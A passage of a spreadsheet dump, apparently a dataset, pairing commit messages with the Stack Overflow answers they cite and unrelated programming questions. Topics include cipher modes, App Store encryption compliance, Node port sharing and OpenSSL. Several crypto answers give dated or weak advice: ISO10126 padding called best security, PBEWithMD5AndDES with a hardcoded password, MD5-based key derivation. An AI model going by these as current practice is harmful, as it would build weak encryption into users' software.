CTR is used if you want good parallelization (ie. speed), instead of CBC/OFB/CFB.
XTS mode is the most common if you are encoding a random accessible data (like a hard disk or RAM).
OCB is by far the best mode, as it allows encryption and authentication in a single pass. However there are patents on it in USA.
The only thing you really have to know is that ECB is not to be used unless you are only encrypting 1 block. XTS should be used if you are encrypting randomly accessed data and not a stream.
You should ALWAYS use unique
IV
's every time you encrypt, and they should be
random
. If you cannot guarantee they are
random
, use OCB as it only requires a
nonce
, not an
IV
, and there is a distinct difference. A
nonce
does not drop security if people can guess the next one, an
IV
can cause this problem.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sometimes, a Python library depends on additional data, such as ML models. This could be a model from &lt;code&gt;transformers&lt;/code&gt;, &lt;code&gt;spacy&lt;/code&gt;, &lt;code&gt;nltk&lt;/code&gt;and so on. Typically there is a command to download such a model:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;python -m nltk.downloader stopwords
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I have this done automatically when my library is installed, when I use modern python packaging (pyproject.toml) and tools (uv)? The reason is that my library is used in another application and that application shouldn't be concerned what models I use under the hood. But I also don't want to download them at run time. AFAIK, there is no post install step anymore.&lt;/p&gt;
&lt;p&gt;I could provide a post install command in my package that the user would have to manually execute once. Is there any convention for this?&lt;/p&gt;
&lt;p&gt;At least for spacy, the models are distributed as wheels. However, they &lt;a href="https://github.com/astral-sh/uv/issues/5478" rel="nofollow noreferrer"&gt;can't be used as dependencies&lt;/a&gt; by uv since they are lacking versions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C82</t>
  </si>
  <si>
    <t>Redirect plain HTTP requests to https://
Nodejs does not natively allow handling both TLS and plain HTTP requests on the same port,
so this required some trickery: we bind a plain TCP server, examine the first byte of the
stream to figure out if its plain or TLS, and delegate to the appropriate handler.
See: https://stackoverflow.com/a/42019773/865693</t>
  </si>
  <si>
    <t xml:space="preserve">If serving HTTP and HTTPS over a single port is an absolute requirement you can proxy the request to the relevant HTTP implementation directly, rather than piping the socket to another port.
httpx.js
'use strict';
let net = require('net');
let http = require('http');
let https = require('https');
exports.createServer = (opts, handler) =&gt; {
    let server = net.createServer(socket =&gt; {
        socket.once('data', buffer =&gt; {
            // Pause the socket
            socket.pause();
            // Determine if this is an HTTP(s) request
            let byte = buffer[0];
            let protocol;
            if (byte === 22) {
                protocol = 'https';
            } else if (32 &lt; byte &amp;&amp; byte &lt; 127) {
                protocol = 'http';
            }
            let proxy = server[protocol];
            if (proxy) {
                // Push the buffer back onto the front of the data stream
                socket.unshift(buffer);
                // Emit the socket to the HTTP(s) server
                proxy.emit('connection', socket);
            }
            // As of NodeJS 10.x the socket must be 
            // resumed asynchronously or the socket
            // connection hangs, potentially crashing
            // the process. Prior to NodeJS 10.x
            // the socket may be resumed synchronously.
            process.nextTick(() =&gt; socket.resume()); 
        });
    });
    server.http = http.createServer(handler);
    server.https = https.createServer(opts, handler);
    return server;
};
example.js
'use strict';
let express = require('express');
let fs = require('fs');
let io =  require('socket.io');
let httpx = require('./httpx');
let opts = {
    key: fs.readFileSync('./server.key'),
    cert: fs.readFileSync('./server.cert')
};
let app = express();
app.use(express.static('public'));
let server = httpx.createServer(opts, app);
let ws = io(server.http);
let wss = io(server.https);
server.listen(8080, () =&gt; console.log('Server started'));
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there anything out there that for .NET that can generate UML diagrams from code. Preferably an addin for Visual Studio. Starting work on a mature project that has little architectural documentation can be painful at first. Eventually you get the ins and outs of the code but helping to see how the code all fits together from the get go would be wonderful.
</t>
  </si>
  <si>
    <t>C820</t>
  </si>
  <si>
    <t>set ITSAppUsesNonExemptEncryption for App Store, registering encrypti
on is not a U.S. law requirement anymore, see https://www.bis.doc.gov/index.php/informationsecurity2016-updates and http://stackoverflow.com/questions/2135081/does-my-application-contain-encryption/40391664#40391664</t>
  </si>
  <si>
    <t>UPDATE: Using HTTPS is now exempt from the ERN as of late September, 2016
https://stackoverflow.com/a/40919650/4976373
Unfortunately, I believe that your app "contains encryption" in terms of US BIS even if you just use HTTPS (if your app is not an exception included in question 2).
Quote from
FAQ on iTunes Connect
:
"
How do I know if I can follow the Exporter Registration and Reporting (ERN) process?
If your app
uses
, accesses, implements or incorporates industry standard encryption algorithms for purposes other than those listed as exemptions under question 2,
you need to submit for an ERN authorization
. Examples of standard encryption are: AES, SSL,
https
. This authorization requires that you submit an annual report to two U.S. Government agencies with information about your app every January.
"
"
2nd Question: Does your product qualify for any exemptions provided under category 5 part 2?
There are several exemptions available in US export regulations under Category 5 Part 2 (Information Security &amp; Encryption regulations) for applications and software that use, access, implement or incorporate encryption.
All liabilities associated with misinterpretation of the export regulations or claiming exemption inaccurately are borne by owners and developers of the apps.
You can answer “YES” to the question if you meet any of the following criteria:
(i) if you determine that your app is not classified under Category 5, Part 2 of the EAR based on the guidance provided by BIS at
encryption question
. The Statement of Understanding for medical equipment in Supplement No. 3 to Part 774 of the EAR can be accessed at Electronic Code of Federal Regulations site. Please visit the Question #15 in the FAQ section of the encryption page for sample items BIS has listed that can claim Note 4 exemptions.
(ii) your app uses, accesses, implements or incorporates encryption for authentication only
(iii) your app uses, accesses, implements or incorporates encryption with key lengths not exceeding 56 bits symmetric, 512 bits asymmetric and/or 112 bit elliptic curve
(iv) your app is a mass market product with key lengths not exceeding 64 bits symmetric, or if no symmetric algorithms, not exceeding 768 bits asymmetric and/or 128 bits elliptic curve.
Please review Note 3 in Category 5 Part 2 to understand the criteria for mass market definition.
(v) your app is specially designed and limited for banking use or ‘money transactions.’ The term ‘money transactions’ includes the collection and settlement of fares or credit functions.
(vi) the source code of your app is “publicly available”, your app distributed at free of cost to general public, and you have met the notification requirements provided under 740.13.(e).
Please visit
encryption
web page in case you need further help in determining if your app qualifies for any exemptions.
If you believe that your app qualifies for an exemption, please answer “YES” to the question."</t>
  </si>
  <si>
    <t xml:space="preserve">I have seen a few examples where the architecture is that there is java on the server side and c# on the client - what makes this combination so good? why would .net on both sides not be a better choice (or in fact, java on both sides?)
added later: in lots of cases, the java is hosted on a windows server itself, i think via tomcat (not 100% sure) - what's the motivation here? 
</t>
  </si>
  <si>
    <t>C821</t>
  </si>
  <si>
    <t xml:space="preserve">Add Pattern topic Test
* Fixed issues with PatternMultiTopicsConsumer
* Add Message Encryption test
* Change Padding from PaddingMode.Zeros to PaddingMode.ISO10126 (https://stackoverflow.com/questions/5266494/rijndaelmanaged-decryption-how-can-i-remove-the-padding-0-gracefully#answer-5266556)
</t>
  </si>
  <si>
    <t>You are most likely not using the correct padding and block modes of the RijndaelManaged instance (called provider in the code below). Since the symmetric encryption providers in .NET are all block ciphers, these settings affect how padding works (as well as how secure the output will be).
The settings below will give you the best security when using RijndaelManaged:
// set the padding algorithm
provider.Padding = PaddingMode.ISO10126; // default is PKCS7
// set the block chaining mode
provider.Mode = CipherMode.CBC;
If you are not the one encrypting the data and you cannot figure out which settings the originating party used then you'll find help in some of the other answers :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a &lt;strong&gt;signature verification&lt;/strong&gt; function in C++&lt;/p&gt;
&lt;p&gt;At first, I used &lt;strong&gt;EC_KEY&lt;/strong&gt; and the result was correct. But there was the warning bellow:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;warning: 'ec_key_st* EVP_PKEY_get1_EC_KEY(EVP_
PKEY*)' is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
.
.
.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, I tried to use &lt;strong&gt;EVP_PKEY&lt;/strong&gt; instead, but the result was wrong.&lt;/p&gt;
&lt;p&gt;this is &lt;strong&gt;EC_KEY&lt;/strong&gt; code:&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;bool isValidSignature (const LicenseData&amp;amp; license_data) {
    string str_license = license_data.version + &amp;quot;_&amp;quot; + 
                        license_data.product + &amp;quot;_&amp;quot; + 
                        license_data.issued + &amp;quot;_&amp;quot; + 
                        license_data.expired_at + &amp;quot;_&amp;quot; + 
                        license_data.max_user + &amp;quot;_&amp;quot; + 
                        license_data.customer + &amp;quot;_&amp;quot; + 
                        license_data.license_hardware_key;
    size_t str_license_len = str_license.length(); 
    string pem_public_key = &amp;quot;-----BEGIN PUBLIC KEY-----\n&amp;quot; + LicenseVerifier::PUBLIC_KEY_BASE_64 + &amp;quot;\n-----END PUBLIC KEY-----&amp;quot;;
    BIO* bio = BIO_new_mem_buf(pem_public_key.data(), pem_public_key.length());
    if (bio == nullptr) {
        throw runtime_error(&amp;quot;Error creating BIO!&amp;quot;);
    }
    EC_KEY* ec_public_key = PEM_read_bio_EC_PUBKEY(bio, nullptr, nullptr, nullptr);
    BIO_free(bio);  
    if (ec_public_key == nullptr) {
        throw runtime_error(&amp;quot;Error loading public key!&amp;quot;);
    }
    std::vector&amp;lt;unsigned char&amp;gt; signature;
    for (size_t i = 2; i &amp;lt; license_data.signature.length(); i += 2) {
        char byte = (char)std::stoi(license_data.signature.substr(i, 2), nullptr, 16);
        signature.push_back(static_cast&amp;lt;unsigned char&amp;gt;(byte));
    }
    unsigned char hash[SHA_DIGEST_LENGTH];
    SHA1(reinterpret_cast&amp;lt;const unsigned char*&amp;gt;(str_license.c_str()), str_license_len, hash);
    int verify_result = ECDSA_verify(0, hash, SHA_DIGEST_LENGTH, signature.data(), signature.size(), ec_public_key);
    EC_KEY_free(ec_public_key);  
    return verify_result == 1;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and this is the &lt;strong&gt;EVP_PKEY&lt;/strong&gt; code:&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt; bool isValidSignature (const LicenseData&amp;amp; license_data) {
    std::string str_license = license_data.version + &amp;quot;_&amp;quot; + 
                              license_data.product + &amp;quot;_&amp;quot; + 
                              license_data.issued + &amp;quot;_&amp;quot; + 
                              license_data.expired_at + &amp;quot;_&amp;quot; + 
                              license_data.max_user + &amp;quot;_&amp;quot; + 
                              license_data.customer + &amp;quot;_&amp;quot; + 
                              license_data.license_hardware_key;
    size_t str_license_len = str_license.length(); 
    std::string pem_public_key = &amp;quot;-----BEGIN PUBLIC KEY-----\n&amp;quot; + LicenseVerifier::PUBLIC_KEY_BASE_64 + &amp;quot;\n-----END PUBLIC KEY-----&amp;quot;;
    BIO* bio = BIO_new_mem_buf(pem_public_key.data(), pem_public_key.length());
    if (bio == nullptr) {
        throw std::runtime_error(&amp;quot;Error creating BIO!&amp;quot;);
    }
    EVP_PKEY* public_key = PEM_read_bio_PUBKEY(bio, nullptr, nullptr, nullptr);
    BIO_free(bio);
    if (public_key == nullptr) {
        throw std::runtime_error(&amp;quot;Error loading public key!&amp;quot;);
    }
    std::vector&amp;lt;unsigned char&amp;gt; signature;
    for (size_t i = 2; i &amp;lt; license_data.signature.length(); i += 2) {
        char byte = (char)std::stoi(license_data.signature.substr(i, 2), nullptr, 16);
        signature.push_back(static_cast&amp;lt;unsigned char&amp;gt;(byte));
    }
    unsigned char hash[SHA_DIGEST_LENGTH];
    SHA1(reinterpret_cast&amp;lt;const unsigned char*&amp;gt;(str_license.c_str()), str_license_len, hash);
    EVP_MD_CTX* md_ctx = EVP_MD_CTX_new();
    if (md_ctx == nullptr) {
        EVP_PKEY_free(public_key);
        throw std::runtime_error(&amp;quot;Error creating EVP_MD_CTX!&amp;quot;);
    }
    int verify_result = EVP_DigestVerifyInit(md_ctx, nullptr, EVP_sha1(), nullptr, public_key);
    if (verify_result != 1) {
        EVP_MD_CTX_free(md_ctx);
        EVP_PKEY_free(public_key);
        throw std::runtime_error(&amp;quot;Error initializing DigestVerify!&amp;quot;);
    }
    verify_result = EVP_DigestVerifyUpdate(md_ctx, hash, SHA_DIGEST_LENGTH);
    if (verify_result != 1) {
        EVP_MD_CTX_free(md_ctx);
        EVP_PKEY_free(public_key);
        throw std::runtime_error(&amp;quot;Error updating DigestVerify!&amp;quot;);
    }
    verify_result = EVP_DigestVerifyFinal(md_ctx, signature.data(), signature.size());
    EVP_MD_CTX_free(md_ctx);
    EVP_PKEY_free(public_key);
    return verify_result == 1;
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The license_data and the PUBLIC_KEY_BASE_64 is the same in the cases. But it returned &lt;strong&gt;true&lt;/strong&gt; with &lt;strong&gt;EC_KEY&lt;/strong&gt; and &lt;strong&gt;false&lt;/strong&gt; with &lt;strong&gt;EVP_PKEY&lt;/strong&gt;.
why??
Thank you!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C822</t>
  </si>
  <si>
    <t>Added needed encryption. Replicated the encryption used in the Java v
ersion given by TNL using:
http://stackoverflow.com/questions/24168246/replicate-javas-pbewithmd5anddes-in-python-2-7</t>
  </si>
  <si>
    <t>Thanks to GregS's comment, I was able to sort this conversion out!
For future reference, this Python code mimics the behavior of the Java code above:
from Crypto.Hash import MD5
from Crypto.Cipher import DES
_password = 'q1w2e3r4t5y6'
_salt = '\x80\x40\xe0\x10\xf8\x04\xfe\x01'
_iterations = 50
plaintext_to_encrypt = 'MyP455w0rd'
# Pad plaintext per RFC 2898 Section 6.1
padding = 8 - len(plaintext_to_encrypt) % 8
plaintext_to_encrypt += chr(padding) * padding
if "__main__" == __name__:
    """Mimic Java's PBEWithMD5AndDES algorithm to produce a DES key"""
    hasher = MD5.new()
    hasher.update(_password)
    hasher.update(_salt)
    result = hasher.digest()
    for i in range(1, _iterations):
        hasher = MD5.new()
        hasher.update(result)
        result = hasher.digest()
    encoder = DES.new(result[:8], DES.MODE_CBC, result[8:16])
    encrypted = encoder.encrypt(plaintext_to_encrypt)
    print encrypted.encode('base64')
This Python code outputs the following in Python 2.7:
Icy6sAP7adLgRoXNYe9N8A==
Thanks again to GregS for pointing me in the right direction!</t>
  </si>
  <si>
    <t xml:space="preserve">Currently I am working on small application in asp.net mvc. It is a some kind of localization tool. Our clients login on our application and they can translate terms that shows up in our applications that they use. It is happens like this:
login to localization site
find and translate certain terms for example title for button in "Catalog" application
start that application(for example, "Catalog" application from 2.) and trough web services they update local database of terms with these that are translated
It is our old solution and that works fine.
But now, I am doing refactoring of a translating tool application in asp.net mvc and I think, why we have separate logic(doubled) in mvc and in web services? Why we can't use only mvc as a web service...this way I have only one logic(fetching elements and updating) and we don't need to create wcf web service or something. And most important, I don't have mesh desktop applications with dependency on dll's in which I have this logic. 
And now the question. What I can get from controller in mvc, except of views and JsonResults...can I get collections of my objects directly?
Or more plain question, how I can use asp.net mvc as a web services. What is your experience?
cheers
Marko 
</t>
  </si>
  <si>
    <t>C823</t>
  </si>
  <si>
    <t>Attach jQuery hooks to document.body instead of DOM 'body' (#1960)
See https://stackoverflow.com/a/49449955/480856
I confirmed that `$( 'body' )` listeners will still work when triggers are sent to `$( document.body )`, so this is back-compatible.</t>
  </si>
  <si>
    <t>They refer to the same element, the difference is that when you say
document.body
you are passing the element directly to jQuery. Alternatively, when you pass the string
'body'
, the
jQuery selector engine
has to interpret the string to figure out what element(s) it refers to.
In practice either will get the job done.
If you are interested, there is more information in the documentation for the
jQuery function
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;`I am on my first JavaScript project and I am building a weather app.&lt;/p&gt;
&lt;p&gt;I was able to extract the 3 hourly forecast Data but it is only showing the first data. Like only 21:00 data in my html but the rest is not reflecting. It should have shown all the able forecast data.&lt;/p&gt;
&lt;p&gt;While writing my html I wrote 6 elements that are responsible for holding the forecast data but I actually needed 8. So I created the forecast item as a way of creating the remaining html. I am meant to add it by the forecast container.innerHTML += forecast item. I didn't do that yet because only 1 of the 6 I already had showed the forecast data. What I want is for the 3 hourly forecast data to automatically reflect in the html for every 24 hours&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;async function getForecast() {
  try {
    // const citySearch = document.getElementById('search-city').value;
    const apiKey = 'APIKEY';
    const forecastFullUrl = `https://api.openweathermap.org/data/2.5/forecast?q=Dudley&amp;amp;appid=${apiKey}&amp;amp;units=metric`;
    console.log('fetching forecast URL:', forecastFullUrl)
const forecastData = { example forecast data }
    console.log(forecastData);
    displayCurrentForecastData(forecastData.list);
  } catch (error) {
    console.error('error fetching hourly forecast data:', error);
    alert('Failed to fetch hourly forecast data');
  }
}
getForecast();
function displayCurrentForecastData(forecastList) {
  // compare today date with the date in the dorecast data and return only the ones that matches today's date
  const currentDate = new Date();
  const currentDateStringToShowOnMainPage = currentDate.toISOString().split('T')[0];
  // to make the date on the main page be the current date
  document.getElementById('current-date').textContent = currentDateStringToShowOnMainPage;
  //  to only shown current day's weather forecast
  const currentDayForecast = forecastList.filter((forecast) =&amp;gt; {
    const time = new Date(forecast.dt * 1000)
    const forecastDateString = time.toISOString().split('T')[0];
    return forecastDateString === currentDateStringToShowOnMainPage;
  })
  // this to make  more html children since i only created 6 spaces in th e html for the 3 hours weather details
  const forecastContainer = document.getElementById('selected-hour-details')
  // forecastContainer.innerHTML = '';
  currentDayForecast.forEach((forecast, index) =&amp;gt; {
    const forecastItem = document.createElement('div');
    forecastItem.className = 'selected-hour-details';
    const time = new Date(forecast.dt * 1000)
    const timeString = time.toLocaleTimeString([], {
      hour: &amp;quot;2-digit&amp;quot;,
      minute: &amp;quot;2-digit&amp;quot;
    });
    const temp = forecast.main.temp;
    const description = forecast.weather[0].description;
    const icon = `http://openweathermap.org/img/wn/${forecast.weather[0].icon}`;
    // to update the 3 hourly html with the forecast details
    document.querySelector('.forecasttime').textContent = timeString;
    document.querySelector('.forecasttemp').textContent = `${temp}Â°C: ${description}`;
    document.querySelector('.weather-icon').src = icon;
    // /create more spaces
    forecastItem.innerHTML = `
              &amp;lt;span class=&amp;quot;forecasttime&amp;quot;&amp;gt;${timeString}&amp;lt;/span&amp;gt;
              &amp;lt;img class=&amp;quot;weather-icon&amp;quot; src=&amp;quot;${icon}&amp;quot; alt=&amp;quot;weather icon&amp;quot;/&amp;gt;
              &amp;lt;span class=&amp;quot;forecasttemp&amp;quot;&amp;gt;${temp}Â°C: ${description}&amp;lt;/span&amp;gt;
            `
    forecastContainer.innerHTML += forecastItem;
  })
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;selected-hour-weather-details&amp;quot; id=&amp;quot;selected-hour-weather-details&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;specific-hours&amp;quot;&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttime&amp;quot;&amp;gt;00:00&amp;lt;/span&amp;gt;
    &amp;lt;img class=&amp;quot;weather-icon&amp;quot; src=&amp;quot;&amp;quot; alt=&amp;quot;weather icon&amp;quot;/&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttemp&amp;quot;&amp;gt;4Â°&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;specific-hours&amp;quot;&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttime&amp;quot;&amp;gt;01:00&amp;lt;/span&amp;gt;
    &amp;lt;img class=&amp;quot;weather-icon&amp;quot; src=&amp;quot;&amp;quot; alt=&amp;quot;weather icon&amp;quot;/&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttemp&amp;quot;&amp;gt;5â€¢&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;specific-hours&amp;quot;&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttime&amp;quot;&amp;gt;02:00&amp;lt;/span&amp;gt;
    &amp;lt;img class=&amp;quot;weather-icon&amp;quot; src=&amp;quot;&amp;quot; alt=&amp;quot;weather icon&amp;quot;/&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttemp&amp;quot;&amp;gt;5â€¢&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;specific-hours&amp;quot;&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttime&amp;quot;&amp;gt;03:00&amp;lt;/span&amp;gt;
    &amp;lt;img class=&amp;quot;weather-icon&amp;quot; src=&amp;quot;&amp;quot; alt=&amp;quot;weather icon&amp;quot;/&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttemp&amp;quot;&amp;gt;5â€¢&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;specific-hours&amp;quot;&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttime&amp;quot;&amp;gt;04:00&amp;lt;/span&amp;gt;
    &amp;lt;img class=&amp;quot;weather-icon&amp;quot; src=&amp;quot;&amp;quot; alt=&amp;quot;weather icon&amp;quot;/&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttemp&amp;quot;&amp;gt;5â€¢&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;specific-hours&amp;quot;&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttime&amp;quot;&amp;gt;05:00&amp;lt;/span&amp;gt;
    &amp;lt;img class=&amp;quot;weather-icon&amp;quot; src=&amp;quot;&amp;quot; alt=&amp;quot;weather icon&amp;quot;/&amp;gt;
    &amp;lt;span class=&amp;quot;forecasttemp&amp;quot;&amp;gt;5â€¢&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C824</t>
  </si>
  <si>
    <t>ci: update ITSEncryptionExportComplianceCode
We were using old ID for the encryption compliance from old Org.
Because of this the iOS release builds failed at TestFlight upload:
```
Error: Asset validation failed Invalid Export Compliance Code.
The export compliance key value [1aa92c4d-6194-4d7d-b70a-16b48256b87e]
in the app's Info.plist doesn’t match the key value of the app’s export
compliance documentation.
To find the correct value, go to My Apps on App Store Connect. (90592)
```
Related:
- https://stackoverflow.com/questions/53326492/</t>
  </si>
  <si>
    <t>My app uses encryption and the key defined in plist  was mismatched by the key provided by App Store Connect.
Now, The question is how to get the key from App Store Connect? Here the doc has mentioned clearly
here
If your app uses encryption, you may be required to provide export
compliance documentation in App Store Connect. If your build doesn’t
use encryption, you specify this information in Xcode.
You upload the export compliance document and submit it for review
using App Store Connect, as described in Provide export compliance
documentation for encryption in App Store Connect Help. Once the
document is approved, App Store Connect will provide key-value pairs
that you can add to the information property list (Info.plist) in your
Xcode project. App Review
If you provide the export compliance information in the build, then
you don’t need to provide this information later when you distribute
your app using TestFlight or submit it to the App Store.
In the Project navigator (), choose the target, then click Info.
In the last row of the target properties table, click the Add button
(+).
In the search field, enter the export compliance key followed by the
Return character and set its value.
If your app is not using encryption, add the App Uses Non-Exempt
Encryption (ITSAppUsesNonExemptEncryption) key and set the value to
NO.
If your app uses encryption, add the App Uses Non-Exempt Encryption
(ITSAppUsesNonExemptEncryption) key and set the value to YES.
If your app requires export compliance, add the App Encryption Export
Compliance Code (ITSEncryptionExportComplianceCode) key and enter the
value for this key provided by App Store Connect.
Go to App Store Connect -&gt;
My Apps
-&gt;
Services tab
then Choose
Encryptionthen
click on iOS Documentation button and provide the appropriate info. After uploading the doc Apple will review and if everything is fine then Apple will provide the key as shown in image below. Add that key in your info.plist file.</t>
  </si>
  <si>
    <t xml:space="preserve">everyone. Can someone share some links on articles about back end caching and fragment caching in ASP MVC applications, best cache architectures, etc. Any useful advices also will be very appreciated. 
</t>
  </si>
  <si>
    <t>C825</t>
  </si>
  <si>
    <t>Switch to Pycryptodome for hashing and encryption
Since the client side still uses OpenSSL we need to make AES (256 CBC) OpenSSL compatible:
Thanks to Joe Linoff, see https://stackoverflow.com/a/42773185
Should solve #16 since we no longer depend on system OpenSSL commands.</t>
  </si>
  <si>
    <t>Given the popularity of Python, at first I was disappointed that there was no complete answer to this question to be found. It took me a fair amount of reading different answers on this board, as well as other resources, to get it right. I thought I might share the result for future reference and perhaps review; I'm by no means a cryptography expert! However, the code below appears to work seamlessly:
from hashlib import md5
from Crypto.Cipher import AES
from Crypto import Random
def derive_key_and_iv(password, salt, key_length, iv_length):
    d = d_i = ''
    while len(d) &lt; key_length + iv_length:
        d_i = md5(d_i + password + salt).digest()
        d += d_i
    return d[:key_length], d[key_length:key_length+iv_length]
def decrypt(in_file, out_file, password, key_length=32):
    bs = AES.block_size
    salt = in_file.read(bs)[len('Salted__'):]
    key, iv = derive_key_and_iv(password, salt, key_length, bs)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    next_chunk = ''
    finished = False
    while not finished:
        chunk, next_chunk = next_chunk, cipher.decrypt(in_file.read(1024 * bs))
        if len(next_chunk) == 0:
            padding_length = ord(chunk[-1])
            chunk = chunk[:-padding_length]
            finished = True
        out_file.write(chunk)
Usage:
with open(in_filename, 'rb') as in_file, open(out_filename, 'wb') as out_file:
    decrypt(in_file, out_file, password)
If you see a chance to improve on this or extend it to be more flexible (e.g. make it work without salt, or provide Python 3 compatibility), please feel free to do so.
Notice
This answer used to also concern encryption in Python using the same scheme. I have since removed that part to discourage anyone from using it. Do NOT encrypt any more data in this way, because it is NOT secure by today's standards. You should ONLY use decryption, for no other reasons than BACKWARD COMPATIBILITY, i.e. when you have no other choice. Want to encrypt? Use NaCl/libsodium if you possibly can.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I use GitHub Codespaces locally with a JetBrains product (e.g. WebStorm)?&lt;/p&gt;
&lt;p&gt;The official documentation mentions JetBrains, but the link is dead (2025-02-19). The link to Visual Studio Code works as expected. When I click JetBrains, I see the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Application error: a client-side exception has occurred (see the browser console for more information).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://github.com/github/opensource.guide/codespaces" rel="nofollow noreferrer"&gt;https://github.com/github/opensource.guide/codespaces&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/Ddq01Ud4.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/Ddq01Ud4.png" alt="Access codespaces from within Visual Studio Code or JetBrains." /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C826</t>
  </si>
  <si>
    <t>Attempt to get continuous deployment working with sbt-heroku
http://stackoverflow.com/a/21941526/438886
http://docs.travis-ci.com/user/encryption-keys/
https://dashboard-next.heroku.com/account
```
$ travis encrypt HEROKU_API_KEY=xxxxxxxx --add
```
https://github.com/heroku/sbt-heroku</t>
  </si>
  <si>
    <t>I'd make a new task for it, and call that in Travis.
val publishMasterOnTravis = taskKey[Unit]("publish master on travis")
def publishMasterOnTravisImpl = Def.taskDyn {
  import scala.util.Try
  val travis   = Try(sys.env("TRAVIS")).getOrElse("false") == "true"
  val pr       = Try(sys.env("TRAVIS_PULL_REQUEST")).getOrElse("false") == "true"
  val branch   = Try(sys.env("TRAVIS_BRANCH")).getOrElse("??")
  val snapshot = version.value.trim.endsWith("SNAPSHOT")
  (travis, pr, branch, snapshot) match {
    case (true, false, "master", true) =&gt; publish
    case _                             =&gt; Def.task ()
  }
}
publishMasterOnTravis := publishMasterOnTravisImpl.value
publishTo := {
  val nexus = s"asdf"
  if (version.value.trim.endsWith("SNAPSHOT")) 
    Some("snapshots" at nexus + "snapshots") 
  else
    Some("releases" at nexus + "releases")
}
The key here is using
Def.taskDyn
, which lets me call
publish
at the tail position without depending on it.
publishTo
would be plain logic.</t>
  </si>
  <si>
    <t xml:space="preserve">Can someone share their experiences with s#arp architecture. we have decided to follow mvp pattern for the project. Is this okay to go with it ? The size of the project is medium. we are going to follow the tdd and ddd.
Can anybody explain how to use this architecture means explain about the layers. we don't have enough time to go through with entire documentation. if anybody expalin particle with small example in short.
please help me out!!!
Thanks,
Milind
</t>
  </si>
  <si>
    <t>C827</t>
  </si>
  <si>
    <t>Attempt to handle TCP issues when (re)starting listener.
Using guidance from http://stackoverflow.com/questions/23786265/erlang-otp-supervisor-gen-tcp-error-eaddrinuse</t>
  </si>
  <si>
    <t>Is the process managing the gen_tcp socket a gen_server? If so, it will make your life easier.
If it is a gen_server, add
process_flag(trap_exit, true)
to your init function. This makes it so that when your process "crashes", it calls the
terminate/2
callback function prior to actually exiting the process. Using this method, you can manually close your listening socket in the terminate function, thereby avoiding the irritating port cleanup delay.
If you are not using a gen_server, the same principle still applies, but you must be much more explicit about catching your errors.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h1&gt;Issue with Parent Condition Context in Else Block During AST Traversal&lt;/h1&gt;
&lt;p&gt;Iâ€™m working on a JavaScript code analysis tool that traverses the Abstract Syntax Tree (AST) to analyze function calls and their conditions. The goal is to dynamically generate a condition chain for each function call based on nested &lt;code&gt;if&lt;/code&gt;, &lt;code&gt;else if&lt;/code&gt;, and &lt;code&gt;else&lt;/code&gt; statements.&lt;/p&gt;
&lt;h3&gt;Problem Description&lt;/h3&gt;
&lt;p&gt;When processing an &lt;code&gt;else&lt;/code&gt; block, Iâ€™m unable to correctly access the parent condition (&lt;code&gt;parent.condition&lt;/code&gt;) to generate the negation of the preceding &lt;code&gt;if&lt;/code&gt; condition. This results in incorrect condition chains for function calls inside the &lt;code&gt;else&lt;/code&gt; block.&lt;/p&gt;
&lt;p&gt;Hereâ€™s a simplified version of the code Iâ€™m analyzing:&lt;/p&gt;
&lt;p&gt;javascript&lt;/p&gt;
&lt;p&gt;å¤åˆ¶&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function foo(a, b) {
    var c = 100;
    if (c &amp;gt; a) {
        if (a &amp;gt; 200) {
            alert(1);
        } else if (a &amp;gt; 100) {
            alert(2);
        } else {
            alert(3); // Condition here is incorrect
        }
    }
}
